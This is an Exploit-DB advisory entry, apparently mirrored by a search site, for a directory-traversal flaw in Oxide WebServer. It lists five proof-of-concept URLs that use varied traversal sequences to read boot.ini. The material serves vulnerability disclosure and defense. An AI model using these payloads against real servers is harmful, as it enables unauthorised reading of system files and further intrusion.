Lucene search

K
exploitdbDemonalexEDB-ID:36376
HistoryNov 29, 2011 - 12:00 a.m.

Oxide WebServer - Directory Traversal

2011-11-2900:00:00
demonalex
www.exploit-db.com
29

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/50845/info

Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. 

http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini

AI Score

7.4

Confidence

Low

Related for EDB-ID:36376